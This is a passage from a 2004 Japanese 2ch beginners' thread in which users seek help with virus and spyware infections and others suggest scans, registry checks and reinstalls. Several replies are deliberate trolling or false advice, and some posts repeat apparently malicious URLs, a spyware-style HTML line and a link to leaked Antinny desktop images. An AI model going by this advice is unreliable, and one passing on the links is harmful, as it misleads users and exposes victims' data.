198 :ひよこ名無しさん:04/07/18 18:08 ID:???
>>196
strangeworld.orgはNGワードにするのが2ちゃんの常識

199 :196:04/07/18 18:40 ID:???
セーフですか、よかった。ありがとうございました。

200 :ひよこ名無しさん:04/07/19 03:48 ID:???
ノートンの2004年バージョンを使っているのですが
更新リストを取り込めずLiveUpdateができません
ここをクリックするとエラーについての詳しい情報を表示します
というところをクリックしても、ページを表示できませんという画面になります
どうしたらいいでしょう?


201 :ひよこ名無しさん:04/07/19 09:26 ID:???
>>200
ネットにつながってないんじゃないか?

202 :ひよこ名無しさん:04/07/19 09:28 ID:???
>>200
>>201に追加、ネット接続にプロキシが必要であれば、LiveUpdateの設定で設定しましょう。


203 :ひよこ名無しさん:04/07/19 14:28 ID:1eRQfy5S
毎日、送ってもいないメールアドレスからエラーメールが返ってきます。
そのメールアドレスは毎回ちがうアドレスなのですが、
自分がよく行くサイトに記載されているメアドから送られてくるようです。
もしかしてウィルスに感染した?((( ;゚Д゚)))ガクガクブルブル

204 :ひよこ名無しさん:04/07/19 14:30 ID:???
>>203
なんでウィルススキャンしないの?

205 :ひよこ名無しさん:04/07/19 15:13 ID:1eRQfy5S
child.dllってのが感染してたよ

206 :ひよこ名無しさん:04/07/19 15:20 ID:???
>>205
炉利野郎

207 :ひよこ名無しさん:04/07/19 15:59 ID:???
>>205
割れ房君。
ポート1500とポート11040には注意だ。

208 :205:04/07/19 16:06 ID:1eRQfy5S
どうやら虫熊のようだな

209 :205:04/07/19 17:00 ID:1eRQfy5S
child.dllが起動中で削除できないんだけどどうすれば終了させられる?

210 :ひよこ名無しさん:04/07/19 17:05 ID:???
>>209
Ctrl+Alt+Del

211 :205:04/07/19 17:13 ID:1eRQfy5S
>>210
Explorer以外全部終了させても消えない

212 :にやこう ◆Es3JBt9s5c :04/07/19 17:15 ID:???
>>211
(・∀・)ニヤニヤ

213 :ひよこ名無しさん:04/07/19 17:16 ID:???
>>211
わからんかったら、Fixして再起動しろよ。

214 :ひよこ名無しさん:04/07/19 17:25 ID:???
>>211
TROJ_SMALL系とかだと思うんだけど、
ウイルスだって分かっているのなら、
せめてどの場所(ディレクトリ)から見つかったかとか、
正確のウイルス名くらい書いてくれ。

215 :205:04/07/19 17:26 ID:1eRQfy5S
>>213
できた。ありがd

216 :ひよこ名無しさん:04/07/19 18:15 ID:lg52NoxV
Windows XP Home Editionで
OpenJaneから2ch見てるんだけど、毒男板開くと毎回
「Unix. Penguin」っつーウィルスを削除しました、っていう
警告が出る。駆除ソフトはノートン先生使ってる。
これはどういうことでしょか

217 :ひよこ名無しさん:04/07/19 18:17 ID:???
>>216
ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/

218 :216:04/07/19 18:19 ID:lg52NoxV
>>217
腺キュー
誤反応なんだね。そっちのスレに目通してみるよ

219 :ひよこ名無しさん:04/07/19 18:25 ID:???
便乗。Win板では「Subject.txt」がUnix.penguinに感染しとるとノートンセンセは言ってますが。
これは一体?

220 :ひよこ名無しさん:04/07/19 18:31 ID:???
>>219
それも同じ。
ノートン先生はウイルスに含まれる一部の文字列だけ検出して判定してる。
TextやスクリプトがないHtmlじゃ感染するわけないのに。
UNIXサーバに対する攻撃用だし。

221 :ひよこ名無しさん:04/07/19 18:33 ID:gqdfr4Gs
【三十路】30歳以上でもアルバイトしてる人集まれ〜
http://school4.2ch.net/test/read.cgi/part/1089525967/l50





だれか助けてください、ここ見たらウイルスに取りつかれました。

どうやってないおしたらいいかわかりません。。

222 :ひよこ名無しさん:04/07/19 18:35 ID:???
>>221
>>217


223 :221:04/07/19 18:40 ID:gqdfr4Gs
そこを見たらっていうか、そこに張ってあったURLクリックしたら変になったんだけど、、
>>217見てもわけわかんないよぉ。

224 :ひよこ名無しさん:04/07/19 18:44 ID:???
( ´_ゝ`)フーン

225 :ひよこ名無しさん:04/07/19 18:51 ID:???
>>223
217にも貼ってあるから。

226 :ひよこ名無しさん:04/07/19 18:54 ID:???
WindowsXP
Norton AntiVirus2003
Internet Explorer6
Backdoor.Trojanというウイルスに感染したようです。
ノートンが勝手にウイルス警告ダイアログを出します。

オブジェクト名:C:\WINDOWS\System32\ms.dll
適用した処理:ファイルを修復できません。

と出ます。
そのファイルを消そうとしますが、そのファイルは存在しないようです。
(すべてのファイルを表示にしています)
公式サイトも見ましたが、うまくいきません。
どうやったら除去できますか?

http://up.nm78.com/data/up047078.gif
こんなのが出ます。


・トレンドマイクロ/オンラインスキャン
ではウイルスは発見されませんでした。
・ad-aware も入れてやりましたが、ダメでした。
・ノートンを完全スキャンしてもウイルスは発見されません

227 :ひよこ名無しさん:04/07/19 18:58 ID:gLBfiG74
>>225
>>217のスレのどの辺に載ってるか教えてもらえないでしょうか?

228 :ひよこ名無しさん:04/07/19 18:59 ID:???
System32フォルダだけスキャンしてみればいいじゃん

229 :ひよこ名無しさん:04/07/19 19:08 ID:???
>>226
まるぽ
回答済みだし

230 :ひよこ名無しさん:04/07/19 19:10 ID:???
>>227
ノートン切って見れば一目瞭然。
どっかのスレに貼る気か?

231 :221:04/07/19 19:15 ID:???
>>230
そんなこと言われてもわかんないよ。
私、初心者だから。助けてくれたらお礼するから助けて。

232 :ひよこ名無しさん:04/07/19 19:20 ID:???
>>231
すまん。
>>221のスレは誤反応じゃなくて、73がウイルスのリンク。

233 :ひよこ名無しさん:04/07/19 19:24 ID:???
みんななんでコイツがノートン入れてると思い込んでんの?w
たぶん何にも入れてないアフォの可能性のが大きいと俺は思う。
さらにはWindowsUpdateしてないハゲ

234 :ひよこ名無しさん:04/07/19 19:24 ID:???
>>226
またそのパターンか
それも、そのファイルをインストールしている大元のファイルがあるんじゃないのか?
レジストリのスタートアップを確認しろ。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

235 :221:04/07/19 19:25 ID:???
>>232
それはわかってるけど、、。
その>>73を踏んだんだけどどうやったら直りますか?

236 :ひよこ名無しさん:04/07/19 19:26 ID:???
>>235
ウイルス対策ソフトで駆除しろ。

237 :ひよこ名無しさん:04/07/19 19:27 ID:???
>>235
踏んだらもうおしまい

238 :ひよこ名無しさん:04/07/19 19:29 ID:???
>>235
再起動後に何が起きるか楽しみにしておけ

239 :ひよこ名無しさん:04/07/19 19:31 ID:???
>>233
うるせーよ、ボケ!
調子のんなよ、タコ。ノートン入れてるごときで偉そうにしてんじゃねーよ、ブサイクが。

240 :ひよこ名無しさん:04/07/19 19:56 ID:BH6B2/3M
http://default-homepage-network.com/start.cgi?hkcu
このアドレスってなに?
間違って踏んじゃったらしらないアイコンでてきたりネットにつなげなくなったり。


241 :ひよこ名無しさん:04/07/19 19:56 ID:???
---------- 糸冬 了 -----------

242 :質問です:04/07/19 20:21 ID:hx3JaZqn
ウイルスに感染してパソコンの画像が悪くなったのが
ウイルスを駆除した後も直りません。
どうしたらいいですか?

243 :ひよこ名無しさん:04/07/19 21:07 ID:ScoKb/Cu
>>242

 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |
       ____.____    | .__  壊れたPCを
     |        |        |   | |\_\  窓から
     |        | ∧_∧ |   | |  |.◎.| 投げ捨てろ
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄


244 :ひよこ名無しさん:04/07/19 21:12 ID:BGGjs847
>>242
そんなの決まってますよ。
修理に出すか・・・・・・なげすてろー


245 :242:04/07/19 21:17 ID:???
さんざん待った答えがそれかい。

246 :ひよこ名無しさん:04/07/19 21:21 ID:???
>>245
「ウイルスに感染してパソコンの画像が悪くなったのが
ウイルスを駆除した後も直りません。
どうしたらいいですか? 」


これだけでは答えようがない。
例えばパソコンの画像がこのように悪くなった、とか、
どんなウィルスに感染したのか、とか、具体的に書いてくれ。


247 :ひよこ名無しさん:04/07/19 21:32 ID:???
>>245
小1時間ほどのことで「さんざん待った」とかほざく香具師。

248 :242:04/07/19 21:35 ID:???
ウイルスの名前は忘れてしまった・・・
画像は、部分部分に荒くなってます。
文字はちゃんと表示される。

パソコン本体に修復機能みたいなのがあるけど
なにをどうやればいいのかも分かりません。

249 :ひよこ名無しさん:04/07/19 21:49 ID:???
>>248
これをやってみ。
「スタート」→「プログラム」→「アクセサリ」→「システムツール」→「システムの復元」

それと画像の解像度をもう一回確認してみ。

ディスクトップを右クリック→「画面のプロパティ」→「設定」

250 :242:04/07/19 22:07 ID:???
>>298
試したけどやっぱり直りませんでした。
>>244の言うとおり修理に出します。
ありがとうございました。

251 :ひよこ名無しさん:04/07/20 10:03 ID:???
「死んだふり」して検知をすり抜ける新種のワームが登場
http://headlines.yahoo.co.jp/hl?a=20040715-00000002-cnet-sci

252 :ひよこ名無しさん:04/07/20 12:19 ID:dl+yKryb
マジでビビっております。神様仏様偉い人教えてください。
普段ローマ字入力なんですが、「A」と入力しても「2」が出てきたり、
「N」と入力しても「f」が出てきたりと、まともに入力できないんです。
一台のパソコンを共有してるのですが、こっちは何ともないのです。
ノートンでチェックしたら「Trojan,ByteVerify」とか言うウイルスが
七つも貼り付いてましたのですぐ検疫したのですが、一向に直りません。
シマンテックのHPに書いてある「Trojan,ByteVerify」に感染した時の
修復方法を試しても、途中で電源が落ちてしまいどうにもなりません。
故障なんですか?やっぱりウイルスの仕業なんでしょうか?


253 :ひよこ名無しさん:04/07/20 12:21 ID:???
>>252
ウイルスです

254 :ひよこ名無しさん:04/07/20 12:31 ID:dl+yKryb
>>253
マジですの?
自分で治す方法ってありますか?
やっぱりシステムの復元しかないのでしょうか?

255 :ひよこ名無しさん:04/07/20 12:32 ID:???
>>254
もちろんそうよ

256 :ひよこ名無しさん:04/07/20 13:37 ID:???
>>252
キーボードドライバを削除して再起動

257 :ひよこ名無しさん:04/07/20 13:46 ID:dl+yKryb
>>256
ホント?
なんか上級者用とか書いてあって不安この上ないのですが…。

258 :ひよこ名無しさん:04/07/20 15:31 ID:MSlo8Mm/
システムの復元の仕方教えて下さい。

259 :ひよこ名無しさん:04/07/20 15:32 ID:???
それ位検索しろよ。脳足りん。

260 :ひよこ名無しさん:04/07/20 15:46 ID:???
>>259
検索しろとか、他スレいけとか、やかましいねん。
優しくないなぁ。少しぐらい教えろよ、検索してもないから聞いてんねん。
なんで偉そうな奴ばっかりなん?教える立場やからって勘違いするなよ。
ケチばっかりやんけ。なんやねん。ここはPC初心者板やぞ、わざわざ敬語使ってやってんだから初心者には優しくしろ。ハゲ。

261 :ひよこ名無しさん:04/07/20 15:52 ID:???
>>260
ばかじゃねえの?

検索すればある。そんな事を一々教えてたら何時まで経っても
自分で思考しない教えてくんだよ。自立的思考失調症なんだよ。お前等。
その上、その程度の事を教えてたら、お前等みたいなヴァカが
何も調べずに質問を繰り返すようになる。

262 :ひよこ名無しさん:04/07/20 15:58 ID:???
なるほど、一件もない…
http://www.google.co.jp/search?num=50&hl=ja&inlang=ja&ie=Shift_JIS&oe=Shift_JIS&q=%83c%83X%83e%83%80%82%CC%95%9C%8C%B3&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

263 :ひよこ名無しさん:04/07/20 16:06 ID:xyY7QmHb
>>261
はいはい、乙。
おまえに聞いてないからいいよ。
わからなかったらしゃしゃりでてこないでね♪(はぁと)

264 :ひよこ名無しさん:04/07/20 16:11 ID:???
>>257
マイクロソフトのこけ脅しに乗るな

265 :ひよこ名無しさん:04/07/20 16:46 ID:dl+yKryb
>>264
ホントですか?大丈夫ですか?
ホントはからかわれてるのですか?
判らないわからないワカラナイ輪kで亜ksjdごあいjふぉあいじぇr@え

266 :ひよこ名無しさん:04/07/20 16:50 ID:???
>>265
勇気のないやつは、ステップアップしないんだぞ。
プロパティを見てプロバイダがMicrosoftになっていれば、またインストールされるから大丈夫。
メーカー名になていたら、入れ直さなきゃならん。

267 :ひよこ名無しさん:04/07/20 17:10 ID:dl+yKryb
>>266
なんで入れ直すすのぉぉぉぉぉぉおぉぉーーーーーーーーーーー!?
なんでそんなロシアンルーレットみたいな事すんのぉぉぉぉおぉぉ!?

…ふんっ。あやうく信じるところだった。いいよいいよ。
答えてねっとで聞いてみるから。
チェッ。スネ夫みたいな奴ばっかりだ!


268 :ひよこ名無しさん:04/07/20 17:14 ID:???
>>267
どこで聞いても回答者は同じだ。

269 :ひよこ名無しさん:04/07/20 17:18 ID:???
>>268
(((((((( ;゚Д゚)))))))ガクガクブルブル

270 :ひよこ名無しさん:04/07/20 17:32 ID:???
どこで聞いてもマルチ氏ねって書き込まれるよ(・∀・)

271 :ひよこ名無しさん:04/07/20 17:50 ID:vFV7xQ8X
>>267
ここで質問しない方がいいよ。ケチと意地悪な奴等ばっかりだから。
あたしなんか嘘教えられて余計にパソコン壊れたからね。
でね、怒ったらね、みんなで「ネタにひっかかるお前が悪い」とか言われたの。
本当にこいつら性格悪いなーって思ったよ。人間不信になりそうだった。


272 :ぼるじょあ ◆yBEncckFOU :04/07/20 17:50 ID:???
(・3・) エェー ボク ちょっとしか ケチじゃないYO

273 :271:04/07/20 18:01 ID:???
あたしね、母親が病気で父親はあたしが生まれてすぐ他界してね、
自分で生きていくしかなかったの。仕事漬けの毎日で貰った給料も母の入院費に当てて、
で、唯一の楽しみがインターネットだったの。
ウイルスもらったみたいでよくわからなかったから2ちゃんねるで質問してたらね、
めちゃくちゃ教えられたの。結局全部のデータが消えてメル友のアドレスもわからなくなって、
なんであたしだけこんな目に遭わなきゃいけないんだろうって思ったの。
贅沢できなくてもいい、普通の生活がしたい・・・って。
本当に辛かったよ。だから今でも2ちゃんねるの人を恨んで○○○○をばら撒きまくってるの。

274 :ひよこ名無しさん:04/07/20 18:02 ID:???
>なんであたしだけこんな目に遭わなきゃいけないんだろうって思ったの。

生命が汚いから。

275 :ひよこ名無しさん:04/07/20 18:33 ID:???
夏の風情

276 :ひよこ名無しさん:04/07/20 19:44 ID:zAqowMvH
↑禿同。

277 :ひよこ名無しさん:04/07/21 05:49 ID:/Kj9kPvu
<base href="res://C:\WINDOWS\SYSTEM\GKPOM.DLL/">

278 :ひよこ名無しさん:04/07/21 17:17 ID:???
ttp://talk.to/hosomichi

間違えて踏んじゃった…なんかもう意味がわかりません…

279 :ひよこ名無しさん:04/07/21 17:22 ID:???
聞いてるこちらもなんかもう意味がわかりません・・・

280 :ひよこ名無しさん:04/07/21 18:10 ID:FEtW4ha6
たぶん>>182と同じ状況だと思います。

ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A
の手順通り一通り修成せいてみたんですが、フォルダがもとの状態に戻らないです。
どのフォルダ開いても□←これしか表示されないんですけど、他にやらないといけないことってありますか?

281 :ひよこ名無しさん:04/07/21 18:55 ID:???
>>280
>>1 読めデブ

282 :ひよこ名無しさん:04/07/21 22:21 ID:lO6ufgvM
オンラインスキャンしたところ

ウィルス名:TROJ_WINTRIM.W
ファイルの場所:c:\windows\system32\ia.dll

というウィルスにかかってしまったんですけど
駆除方法はどうすればよいのでしょう?
http://www.sophos.co.jp/support/disinfection/trojan.html#2
↑から駆除方法探したんですけどウィルス名もHITしない状況では
駆除方法なんてないんでしょうか?

283 :ひよこ名無しさん:04/07/21 22:22 ID:???
>>282
オンラインスキャンしたサイトのデータベースで照会しろよ。
ソフトメーカーによってウィルス名が微妙に異なる事がある。

284 :282:04/07/21 22:35 ID:lO6ufgvM
>>283
今さっきオンラインスキャンしたサイトで検索したところ
「TROJ_WINTRIM」はみつかるのですが「.W」が見つからないです。
この場合どうすればよいのでしょうか。


285 :ひよこ名無しさん:04/07/21 22:43 ID:???
>>284
そのURL貼れ。
で、書いてある駆除方法で符合してるものをやれ。

286 :282:04/07/21 22:54 ID:lO6ufgvM
>>285
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=a&virus=WINTRIM&alt=WINTRIM&key=WINTRIM&payload=&type=&day=&month=&year=&wkday=
符号してるものとはどういったものでしょうか?
国語(日本語)の勉強しろよとかいわれそうですが教えてください

287 :ひよこ名無しさん:04/07/21 23:08 ID:FEtW4ha6
>>281
スマン。
もうどうしようもなくなってきたんで、オンラインスキャンしてみようと思ったんだけど、
「ActiveScanのインストール中にエラーが発生しました。インターネットが正しく接続されて
いるか確認し、[再試行]をクリックしてください。」
って出てきて普通にネットには繋がるんだけどインストールもできないです。
もうダメポ

288 :ひよこ名無しさん:04/07/21 23:36 ID:???
>>287

AVGっていう駆除ソフトいれろ フリーだからもっててソンはない
ただし英語は頑張って読め

http://ringonoki.net/tool/antiv/avg.html

289 :287:04/07/21 23:53 ID:FEtW4ha6
>>288
d。
一応さっき、ノートンでスキャンしてみたんですけど、
VBS.ラブレターと、Unix.penguinが二個とMacroってのに感染してて削除しました。


というか、初心者なのに何も考えないで踏んだら駄目ですね。。
おとなしく初期化します

290 :ひよこ名無しさん:04/07/21 23:54 ID:???
>>289
それ誤反応なんだけど・・・

291 :ひよこ名無しさん:04/07/21 23:54 ID:???
>>289
それで済めばかわいいものだな

292 :ひよこ名無しさん:04/07/21 23:56 ID:???
>>289
初期化するんならいいか
俺は今年に入ってウィルスにやられても放置してた
さすがにメールだしまくってるらしいので、AVGいれたら10000ファイル以上のウィルス関係のブツが見つかったよ

293 :292:04/07/22 00:01 ID:???
ウィルス駆除できるかな・・・・・・・・・・・

294 :ひよこ名無しさん:04/07/22 00:03 ID:???
>>293
あんたこそ初期化しろ

295 :ひよこ名無しさん:04/07/22 00:05 ID:PBn2Glgw
俺の頭じゃこれが限界で。。
>>290
フォルダが見れないのと、IE起動時にC:\WINDOWS\secure.htmlに飛ばされる。
でもファイルが壊されてるわけでもないし。やっぱり駄目だ・・

296 :ひよこ名無しさん:04/07/22 00:08 ID:???
>>295
なかなか良いものをお持ちのようで

297 :俺が292:04/07/22 00:08 ID:???
>>293
心配あんがとよ 全部駆除したよ

298 :ひよこ名無しさん:04/07/22 00:18 ID:???
>>295
情報小出しだなぁ・・・
でもやっぱり初期化で正解だわ(・∀・)ニヤニヤ

>297
もつかれ

299 :ひよこ名無しさん:04/07/22 00:31 ID:8fPO2HnO
3年間ウィルス対策を何もしていなくて、不安になったため、
オンラインウィルススキャンができるサイトに行こうとしたら、
「不正な処理が行われたため、強制終了します」
というような表示が出て、IEを終了せざるをえなくなります。
この表示はたまに出るのですが、
ウィルススキャンのサイトに限って必ずその表示が出るのです。
ウィルススキャンができるサイトを10箇所以上回ったのですが、
全滅でした。
そんなにしょっちゅう出る表示じゃないのに。
ウィルススキャンのできるサイトへアクセスするのを
妨害するウイルスなんてあるのでしょうか?
バカな質問だったらごめんなさい。

300 :ひよこ名無しさん:04/07/22 00:32 ID:???
>>299
ある

301 :ひよこ名無しさん:04/07/22 00:32 ID:???
>>299
ウィルスソフトを妨害するウィルスはある。
まぁ、舐めて掛かったことを後悔してウィルス対策ソフトを買うんだな。

Windowsは再インストールね。

302 :ひよこ名無しさん:04/07/22 00:35 ID:mWrCddgL
LIVE2chをやっていると時々ウイルスを検出し、修復できないという
メッセージが出るのですが、これはほっといてよいのでしょうか?


303 :ひよこ名無しさん:04/07/22 00:35 ID:???
>>302
ああ、放っておいていいよ。

304 :ひよこ名無しさん:04/07/22 00:36 ID:???
>>302
いい
2ch見るだけで感染するウィルスはない

ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/
このスレも見ると誤反応する

305 :ひよこ名無しさん:04/07/22 00:44 ID:???
>>304
ご飯脳しないんだけど大丈夫なの?ノートン2003更新シマクリです

306 :299:04/07/22 00:45 ID:8fPO2HnO
すみません、具体的にそれは何と言うウイルスで、
どのような被害があるのでしょうか?
Windowsの再インストール・・・
どうすればよいのやら(汗


307 :ひよこ名無しさん:04/07/22 00:46 ID:???
>>299
店頭でウイルス駆除ソフトを購入しろ。
スパイウエアも入ってるかもな。情報だだもれかもよ。

308 :ひよこ名無しさん:04/07/22 00:48 ID:???
>>306
体調悪いです。私はどんな病気にかかってますか?

309 :ひよこ名無しさん:04/07/22 00:50 ID:???
たぶん、なんかの病気だと思います。>>308

310 :ひよこ名無しさん:04/07/22 00:53 ID:???
>>306
とりあえずAd-awareとSpybot1.3でPCの掃除してみてはどうでしょう?


311 :299:04/07/22 00:56 ID:8fPO2HnO
何がなんだかわかりませんが、とりあえず明日
ウイルス駆除ソフトを買ってみます。
ありがとうございました。

312 :ひよこ名無しさん:04/07/22 00:59 ID:???
>>295
スパイウェアちゃんとお友達。

ホームページがsecure32.html、secure.html、security-warning.com/secure2.phpに
ttp://higaitaisaku.web.infoseek.co.jp/removereg32.html

>>299
ほとんどのウイルスは感染した後、
自分が駆除されないためになんらかの防衛をする。
具体的にそれは何と言うウイルスと聞かれても、
症状が細かく説明されないと特定まではできない。

HackerDefenderを悪用したスパイウェア − スパイウェア除去アプリケーションが使えない
ttp://higaitaisaku.web.infoseek.co.jp/removehacdef.html

313 :299:04/07/22 02:11 ID:???
ありがとうございます。
ウィルスってそんな賢いのもいるんですね。
パソコンに対して全くの無知なので、
多分Windowsの再インストールなんてできないと思います。
最悪の場合電気屋さん行きですね。はぁ。
でもできるとこまで自分でがんばってみます(`・ω・´)シャキーン

314 :ひよこ名無しさん:04/07/22 02:15 ID:???
(`・ω・´)シャキーンとかしてる場合ではない

315 :ひよこ名無しさん:04/07/22 02:28 ID:???
ウイルススキャンをセーフガード中に行おうとしたのですが、初期化が・・・が
表記されるだけでスキャンできません。スパイウェアは問題なくセーフガード中に
できます。どうすればできますか?

それと、復元もできません。なにかウイルスに感染しているのでしょうか?
わかる方、もしくは対処の仕方のHP知ってる方教えて下さい。

316 :ひよこ名無しさん:04/07/22 02:44 ID:CLcpNxda
ウィルスバスター2004で検索したら下記のウィルスが検出されました。
しかしながら、テレンドマイクロのデータベースにも記載されておらず
どんな悪さをするものなのか不安です。ご存知の方教えて下さい。

JS_STARTPAG.AD

317 :ひよこ名無しさん:04/07/22 02:46 ID:???
>>316
たぶんスタートページ改変

318 :ひよこ名無しさん:04/07/22 03:04 ID:???
>>316
どこから検出されたのかちゃんと書け。JSはJavaScriptの略だから
Webページを閲覧した時にインターネット一時ファイルに残っている
可能性が高い。スクリプトが実行されていたらレジストリを書き換えられて
>>317の言うようにホームページが変更されるなどの症状が出るだろうな。
要するにスパイウェア。

319 :ひよこ名無しさん:04/07/22 04:33 ID:JT+v/gPL
初期化ってどうやるんですか?
あと初期化したらウイルスはなくなりますか?


320 :ひよこ名無しさん:04/07/22 04:39 ID:???
>>319
ウィルスは無くなるがやり方は説明書読め。


321 :ひよこ名無しさん:04/07/22 07:28 ID:yCNfmr9O
【ここで質問してる人たちへ】

 他 の サ イ ト で 質 問 す る 方 が 親 切 だ し 丁 寧 だ し イ イ で す よ 。


ここの奴等=言葉使い悪い、嘘教える、見下す、の三拍子揃ってますから。
日本最大のQ&Aサイトとかいうところ見つけてそこで質問したらめちゃくちゃ丁寧で親切に教えてくれました。

それに比べてここの奴等は糞です。おそらく、ここで質問する方が早いレスが貰えると思ってここで質問してる人が
大半と思いますが、めちゃくちゃなことばかり言って来る奴が多いので、結局は問題を改善するのに
時間がかなり掛かります。賢い人は2chで質問するのはやめましょう。
誰が誰かわからないし、すぐに暴言吐く嫌な奴ばかりです。
私の心には、ここで受けた「暴言・中傷」というウイルスが感染していて駆除できません。


322 :ひよこ名無しさん:04/07/22 09:37 ID:???
>>321
マルチコピペ氏んでよし

323 :ひよこ名無しさん:04/07/22 10:11 ID:???
>>322
おまも死でいいよ。

324 :ひよこ名無しさん:04/07/22 12:00 ID:???
>>321=>>323(´∀`)

325 :ひよこ名無しさん:04/07/22 13:46 ID:???
>>323
> おまも死でいいよ。

句読点も入れてわずか9文字しかないの2度も間違ってる…


326 :ひよこ名無しさん:04/07/22 14:22 ID:???
>>325
あんたも日本語変だよ。
自分で気が付けば良いけど、分かるかな?

327 :ひよこ名無しさん:04/07/22 14:45 ID:???
良スレage

328 :ひよこ名無しさん:04/07/22 15:17 ID:???
パソコンを親に買ってもらったのですが使って一週間くらいたったらwinXP起動時の音が荒れるようになってしまいました。大体2週間くらい使ってからおかしくなったのですがこれはウイルスにようるものなのでしょうか?

329 :ひよこ名無しさん:04/07/22 15:19 ID:???
>>328
うっせえハゲ。

330 :ひよこ名無しさん:04/07/22 15:22 ID:???
> winXP起動時の音が荒れるようになってしまいました。
意味が分からない、どういう状態なの?

331 :ひよこ名無しさん:04/07/22 15:28 ID:???
>>328
>パソコンを親に買ってもらったのですが

よかったな
メーカーのサイトに行くと、各ドライバとバンドルアプリレーションのアップデートモジュールがあるかもしれないから、
アップデートする。自分で探すように!

332 :ひよこ名無しさん:04/07/22 16:12 ID:HyhfRnOz
Windowsを起動すると何もしていないのにいきなり
フォルダを開いた画面があらわれます。
自分なりに調べてみると、C:\の中にUPFolder.txtが勝手に作られていました。
その中には、
[BicBic]
Path=C:\windows\bugfix
Trip=
と書いてあったので、bugfixを見てみると、
 私は既定、antinnyの作者だ 
 アドレス帳お気に入り既定
の二つがありました。何回削除しても起動するたびに現れます。
どうすればこれらを現れなくすることができるのでしょうか?
長々とすいませんが教えていただけないでしょうか?お願いします。

333 :ひよこ名無しさん:04/07/22 16:16 ID:???
>>332
キンタマウイルス感染
悪いことやってただろ?

334 :ひよこ名無しさん:04/07/22 16:17 ID:???
>>332
Winny使っているだろ

335 :ひよこ名無しさん:04/07/22 16:18 ID:???
>>332
さあ、調べてみよう!
HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CLASSES_ROOT\exefile\shell\command
HKEY_CLASSES_ROOT\txtfile\shell\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_Dlls

336 :ひよこ名無しさん:04/07/22 17:31 ID:RDh6D4wx
332です
winny使ってました。もうやめました。すいません。
今から335さんのレジストリ見てみます。

337 :ひよこ名無しさん:04/07/22 17:35 ID:RDh6D4wx
レジストリを見ても何を削除したらいいのかが
分かりませんでした。すいませんが教えてもらえないでしょうか?

338 :ひよこ名無しさん:04/07/22 17:39 ID:???
>>337
ここのテンプレには書いてないけど、nyに関する質問は禁止事項なんだよね(違法行為につき)
でもまずは、ウィルススキャンしなきゃね

339 :ひよこ名無しさん:04/07/22 17:40 ID:???
>>337
HijackThis
ttp://higaitaisaku.web.infoseek.co.jp/HijackThis.exe

これ取ってきて04だけ貼ってみて。

340 :ひよこ名無しさん:04/07/22 17:41 ID:???
>>332
こんなのあったよ、あなたのもあるかも(・∀・)

ttp://aa4a.com/goldball/
ウイルス「Antinny」によって流出したデスクトップ画像が置いてあるサイト。
PC無害。倫理的にはどうかと。

341 :ひよこ名無しさん:04/07/22 17:53 ID:RDh6D4wx
みなさんありがとう。
今からやってみます。
後で報告に来ますね。


342 :ひよこ名無しさん:04/07/22 17:58 ID:???
>>341
ウイルススキャンしても出ないと思うから、
たぶんズバリと思われる情報のURLを教えておくよ。
もうnyやめなよ。

【警報】Winnyを狙ったワーム・ウイルス情報 Part22
ttp://tmp4.2ch.net/test/read.cgi/download/1089460762/519-520

343 :ひよこ名無しさん:04/07/22 18:01 ID:EDDYOBN3
PC初心です。
ウイルス感染してしまい、メール受信ができません。
同じメールが何十回も受信されてきます。
ウイルススキャンをしたら、トロイの木馬と書いてあります。
どうしたらよいでしょうか??
朝から今まで奮闘しても、結局何の解決もしてません。
どうか、教えてください。

344 :ひよこ名無しさん:04/07/22 18:04 ID:???
>>343
ウィルス名書けよ

345 :ひよこ名無しさん:04/07/22 18:11 ID:+a/tewbN
フグリウイルスです。

346 :315:04/07/22 19:07 ID:3tIueRnk
ウイルススキャンをセーフガード中に行おうとしたのですが、初期化が・・・が
表記されるだけでスキャンできません。スパイウェアは問題なくセーフガード中に
できます。どうすればできますか?

それと、復元もできません。なにかウイルスに感染しているのでしょうか?
わかる方、もしくは対処の仕方のHP知ってる方教えて下さい。

誰か・・・_| ̄|○


347 :ひよこ名無しさん:04/07/22 19:08 ID:???
>>346
再インストール

348 :ひよこ名無しさん:04/07/22 19:21 ID:???
>>346
セーフガードって何?

349 :ひよこ名無しさん:04/07/22 19:23 ID:???
>>348
多分、その昔、LIFEガードと同じ会社が出してた炭酸飲料水だと思う。

350 :ひよこ名無しさん:04/07/22 19:25 ID:???
>>349
ほぉほぉ

じゃあ再インストールだね

351 :ひよこ名無しさん:04/07/22 19:36 ID:abUwJnXk
>>321
ありがと。
他のサイトで聞いたらすぐに解決したよ。
ここは終わってるね。

352 :ひよこ名無しさん:04/07/22 19:36 ID:???
>>348
緊急輸入制限措置のことで、輸入を減らすために高率の関税を課したり、
輸入数量を制限したりすることをいいます。
http://www.nikkei4946.com/today/0204/01.html

OSをセーフガードされない国内産のものと交換しろ。

353 :ひよこ名無しさん:04/07/22 20:26 ID:vbN2/EOg
ホームページが
about:blank
になってしまって
ツールでyahooにしてもだめでした
たすけてくださぁーい!!


354 :ひよこ名無しさん:04/07/22 20:26 ID:???
>>353
エロサイトスレのテンプレやれ

と言いたいところだけどアホそうだから素直にOS再インストールしとけ。

355 :315:04/07/22 20:27 ID:3tIueRnk
誤爆した・・・

356 :ひよこ名無しさん:04/07/22 23:58 ID:???
ここは日本語教育スレですね!


357 :ひよこ名無しさん:04/07/23 12:11 ID:a43c28Ez
>>339
